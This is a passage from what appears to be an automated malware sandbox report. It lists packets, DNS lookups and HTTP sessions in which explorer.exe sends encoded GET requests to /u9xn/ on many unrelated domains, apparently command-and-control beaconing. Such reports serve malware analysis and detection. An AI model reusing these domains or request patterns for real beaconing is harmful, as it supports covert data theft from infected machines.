                                                              Oct 27, 2021 16:20:38.100963116 CEST804979174.208.236.134192.168.2.5
                                                              Oct 27, 2021 16:20:38.101145983 CEST4979180192.168.2.574.208.236.134
                                                              Oct 27, 2021 16:20:38.101341009 CEST4979180192.168.2.574.208.236.134
                                                              Oct 27, 2021 16:20:38.240120888 CEST804979174.208.236.134192.168.2.5
                                                              Oct 27, 2021 16:20:38.245042086 CEST804979174.208.236.134192.168.2.5
                                                              Oct 27, 2021 16:20:38.245069981 CEST804979174.208.236.134192.168.2.5
                                                              Oct 27, 2021 16:20:38.245238066 CEST4979180192.168.2.574.208.236.134
                                                              Oct 27, 2021 16:20:38.245296001 CEST4979180192.168.2.574.208.236.134
                                                              Oct 27, 2021 16:20:38.384107113 CEST804979174.208.236.134192.168.2.5
                                                              Oct 27, 2021 16:20:43.290530920 CEST4979280192.168.2.5137.184.31.35
                                                              Oct 27, 2021 16:20:43.384162903 CEST8049792137.184.31.35192.168.2.5
                                                              Oct 27, 2021 16:20:43.386384964 CEST4979280192.168.2.5137.184.31.35
                                                              Oct 27, 2021 16:20:43.386756897 CEST4979280192.168.2.5137.184.31.35
                                                              Oct 27, 2021 16:20:43.479943037 CEST8049792137.184.31.35192.168.2.5
                                                              Oct 27, 2021 16:20:43.479991913 CEST8049792137.184.31.35192.168.2.5
                                                              Oct 27, 2021 16:20:43.480020046 CEST8049792137.184.31.35192.168.2.5
                                                              Oct 27, 2021 16:20:43.480144978 CEST4979280192.168.2.5137.184.31.35
                                                              Oct 27, 2021 16:20:43.480187893 CEST4979280192.168.2.5137.184.31.35
                                                              Oct 27, 2021 16:20:43.573841095 CEST8049792137.184.31.35192.168.2.5
                                                              Oct 27, 2021 16:20:48.524415016 CEST4979480192.168.2.53.67.234.155
                                                              Oct 27, 2021 16:20:48.543287992 CEST80497943.67.234.155192.168.2.5
                                                              Oct 27, 2021 16:20:48.543474913 CEST4979480192.168.2.53.67.234.155
                                                              Oct 27, 2021 16:20:48.543695927 CEST4979480192.168.2.53.67.234.155
                                                              Oct 27, 2021 16:20:48.562482119 CEST80497943.67.234.155192.168.2.5
                                                              Oct 27, 2021 16:20:48.563533068 CEST80497943.67.234.155192.168.2.5
                                                              Oct 27, 2021 16:20:48.563545942 CEST80497943.67.234.155192.168.2.5
                                                              Oct 27, 2021 16:20:48.563728094 CEST4979480192.168.2.53.67.234.155
                                                              Oct 27, 2021 16:20:48.563811064 CEST4979480192.168.2.53.67.234.155
                                                              Oct 27, 2021 16:20:48.582614899 CEST80497943.67.234.155192.168.2.5
                                                              Oct 27, 2021 16:20:54.008038044 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.026999950 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.027224064 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.027491093 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.046297073 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.332242012 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.332283020 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.332321882 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.332348108 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.332403898 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.332470894 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.332551003 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.346199036 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.346251965 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.346281052 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.346395969 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.346482992 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.346492052 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.351926088 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.352049112 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:59.367558956 CEST4979980192.168.2.5160.153.136.3
                                                              Oct 27, 2021 16:20:59.424536943 CEST8049799160.153.136.3192.168.2.5
                                                              Oct 27, 2021 16:20:59.425210953 CEST4979980192.168.2.5160.153.136.3
                                                              Oct 27, 2021 16:20:59.425259113 CEST4979980192.168.2.5160.153.136.3
                                                              Oct 27, 2021 16:20:59.478327990 CEST8049799160.153.136.3192.168.2.5
                                                              Oct 27, 2021 16:20:59.480664968 CEST8049799160.153.136.3192.168.2.5
                                                              Oct 27, 2021 16:20:59.480694056 CEST8049799160.153.136.3192.168.2.5
                                                              Oct 27, 2021 16:20:59.481018066 CEST4979980192.168.2.5160.153.136.3
                                                              Oct 27, 2021 16:20:59.481241941 CEST4979980192.168.2.5160.153.136.3
                                                              Oct 27, 2021 16:20:59.538345098 CEST8049799160.153.136.3192.168.2.5

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 27, 2021 16:20:06.712508917 CEST6173353192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:06.743684053 CEST53617338.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:11.822491884 CEST5244153192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:11.851373911 CEST53524418.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:17.090502977 CEST6217653192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:17.121787071 CEST53621768.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:22.154433012 CEST6529653192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:22.632325888 CEST53652968.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:27.684767962 CEST6318353192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:27.706388950 CEST53631838.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:32.859416008 CEST6015153192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:32.895567894 CEST53601518.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:37.928250074 CEST5696953192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:37.960422039 CEST53569698.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:43.266113997 CEST5516153192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:43.288822889 CEST53551618.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:48.498081923 CEST4999253192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:48.522423029 CEST53499928.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:53.596335888 CEST5501653192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:54.006380081 CEST53550168.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:59.343343973 CEST6434553192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:59.366530895 CEST53643458.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:21:04.495866060 CEST5712853192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:21:04.568428993 CEST53571288.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:21:09.669536114 CEST5479153192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:21:09.724406958 CEST53547918.8.8.8192.168.2.5

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Oct 27, 2021 16:20:06.712508917 CEST192.168.2.58.8.8.80xf370Standard query (0)www.salvationshippingsecurity.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:11.822491884 CEST192.168.2.58.8.8.80xc99cStandard query (0)www.mykombuchafactory.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:17.090502977 CEST192.168.2.58.8.8.80xf357Standard query (0)www.christinegagnonjewellery.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:22.154433012 CEST192.168.2.58.8.8.80xbd03Standard query (0)www.umgaleloacademy.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:27.684767962 CEST192.168.2.58.8.8.80x94b1Standard query (0)www.heyunshangcheng.infoA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:32.859416008 CEST192.168.2.58.8.8.80x88d5Standard query (0)www.sfcn-dng.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:37.928250074 CEST192.168.2.58.8.8.80x6bStandard query (0)www.crisisinterventionadvocates.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:43.266113997 CEST192.168.2.58.8.8.80xca7bStandard query (0)www.srchwithus.onlineA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:48.498081923 CEST192.168.2.58.8.8.80xc27eStandard query (0)www.itskosi.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:53.596335888 CEST192.168.2.58.8.8.80xefeeStandard query (0)www.sejiw3.xyzA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:59.343343973 CEST192.168.2.58.8.8.80xd5c3Standard query (0)www.hanansalman.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.495866060 CEST192.168.2.58.8.8.80x9355Standard query (0)www.rbrituelbeaute.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:09.669536114 CEST192.168.2.58.8.8.80xdf24Standard query (0)www.pronogtiki.storeA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Oct 27, 2021 16:20:06.743684053 CEST8.8.8.8192.168.2.50xf370No error (0)www.salvationshippingsecurity.comsalvationshippingsecurity.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:06.743684053 CEST8.8.8.8192.168.2.50xf370No error (0)salvationshippingsecurity.com51.210.240.92A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:11.851373911 CEST8.8.8.8192.168.2.50xc99cName error (3)www.mykombuchafactory.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:17.121787071 CEST8.8.8.8192.168.2.50xf357Name error (3)www.christinegagnonjewellery.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:22.632325888 CEST8.8.8.8192.168.2.50xbd03Server failure (2)www.umgaleloacademy.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:27.706388950 CEST8.8.8.8192.168.2.50x94b1No error (0)www.heyunshangcheng.infoheyunshangcheng.infoCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:27.706388950 CEST8.8.8.8192.168.2.50x94b1No error (0)heyunshangcheng.info34.102.136.180A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:32.895567894 CEST8.8.8.8192.168.2.50x88d5Name error (3)www.sfcn-dng.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:37.960422039 CEST8.8.8.8192.168.2.50x6bNo error (0)www.crisisinterventionadvocates.com74.208.236.134A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:43.288822889 CEST8.8.8.8192.168.2.50xca7bNo error (0)www.srchwithus.onlinesrchwithus.onlineCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:43.288822889 CEST8.8.8.8192.168.2.50xca7bNo error (0)srchwithus.online137.184.31.35A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:48.522423029 CEST8.8.8.8192.168.2.50xc27eNo error (0)www.itskosi.com3.67.234.155A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:48.522423029 CEST8.8.8.8192.168.2.50xc27eNo error (0)www.itskosi.com3.67.153.12A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:54.006380081 CEST8.8.8.8192.168.2.50xefeeNo error (0)www.sejiw3.xyz35.241.55.103A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:59.366530895 CEST8.8.8.8192.168.2.50xd5c3No error (0)www.hanansalman.comhanansalman.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:59.366530895 CEST8.8.8.8192.168.2.50xd5c3No error (0)hanansalman.com160.153.136.3A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)www.rbrituelbeaute.comweb.jimdosite.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)web.jimdosite.comdolphin-renderserve-prod.jimdo-platform.netCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-renderserve-prod.jimdo-platform.netdolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.210.179.84A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.214.190.156A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.209.227.237A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.212.67.61A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:09.724406958 CEST8.8.8.8192.168.2.50xdf24No error (0)www.pronogtiki.store5.101.153.216A (IP address)IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • www.salvationshippingsecurity.com
                                                              • www.heyunshangcheng.info
                                                              • www.crisisinterventionadvocates.com
                                                              • www.srchwithus.online
                                                              • www.itskosi.com
                                                              • www.sejiw3.xyz
                                                              • www.hanansalman.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.54975551.210.240.9280C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:06.775928020 CEST1395OUTGET /u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.salvationshippingsecurity.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:06.802059889 CEST1396INHTTP/1.1 301 Moved Permanently
                                                              Server: nginx
                                                              Date: Wed, 27 Oct 2021 14:20:06 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 162
                                                              Connection: close
                                                              Location: https://www.salvationshippingsecurity.com/u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              1192.168.2.54979034.102.136.18080C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:27.729743958 CEST9249OUTGET /u9xn/?EvGDLnJ=RrR08BH4oIo+gx361vOF46QRRg434M3aJQMobyGncW6ZpM1n/iVBy8ajhiKV3UdnqaZn&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.heyunshangcheng.info
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:27.846381903 CEST9250INHTTP/1.1 403 Forbidden
                                                              Server: openresty
                                                              Date: Wed, 27 Oct 2021 14:20:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 275
                                                              ETag: "61704c6b-113"
                                                              Via: 1.1 google
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              2192.168.2.54979174.208.236.13480C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:38.101341009 CEST9251OUTGET /u9xn/?EvGDLnJ=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.crisisinterventionadvocates.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:38.245042086 CEST9252INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Content-Length: 626
                                                              Connection: close
                                                              Date: Wed, 27 Oct 2021 14:20:38 GMT
                                                              Server: Apache
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              3192.168.2.549792137.184.31.3580C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:43.386756897 CEST9253OUTGET /u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.srchwithus.online
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:43.479991913 CEST9254INHTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 27 Oct 2021 14:20:43 GMT
                                                              Server: Apache/2.4.37 (centos) OpenSSL/1.1.1g
                                                              Location: https://www.srchwithus.online/u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n
                                                              Content-Length: 338
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 72 63 68 77 69 74 68 75 73 2e 6f 6e 6c 69 6e 65 2f 75 39 78 6e 2f 3f 45 76 47 44 4c 6e 4a 3d 4a 73 2b 73 67 6d 52 61 49 56 55 71 37 71 46 7a 73 4a 41 4a 2b 39 41 58 58 4c 5a 43 30 58 37 39 63 63 37 71 71 6f 5a 42 6b 4c 61 46 78 59 73 31 73 6d 6f 71 38 56 4f 4c 6d 51 55 74 74 69 70 4c 68 66 4c 7a 26 61 6d 70 3b 35 6a 3d 30 42 4b 50 67 68 37 58 34 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.srchwithus.online/u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&amp;5j=0BKPgh7X4n">here</a>.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              4192.168.2.5497943.67.234.15580C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:48.543695927 CEST9263OUTGET /u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.itskosi.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:48.563533068 CEST9264INHTTP/1.1 301 Moved Permanently
                                                              cache-control: public, max-age=0, must-revalidate
                                                              content-length: 44
                                                              content-type: text/plain
                                                              date: Tue, 26 Oct 2021 10:09:50 GMT
                                                              x-nf-request-id: 01FK11ZZ198CWTS1MT7WAK41C6
                                                              location: https://www.itskosi.com/u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n
                                                              server: Netlify
                                                              age: 101459
                                                              Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 73 6b 6f 73 69 2e 63 6f 6d 2f 75 39 78 6e 2f
                                                              Data Ascii: Redirecting to https://www.itskosi.com/u9xn/


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              5192.168.2.54979835.241.55.10380C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:54.027491093 CEST9277OUTGET /u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.sejiw3.xyz
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:54.332242012 CEST9278INHTTP/1.1 200 OK
                                                              Server: nginx/1.14.0
                                                              Date: Wed, 27 Oct 2021 14:20:54 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 5379
                                                              Last-Modified: Fri, 30 Apr 2021 06:44:28 GMT
                                                              Vary: Accept-Encoding
                                                              ETag: "608ba74c-1503"
                                                              Cache-Control: no-cache
                                                              Accept-Ranges: bytes
                                                              Via: 1.1 google
                                                              Connection: close
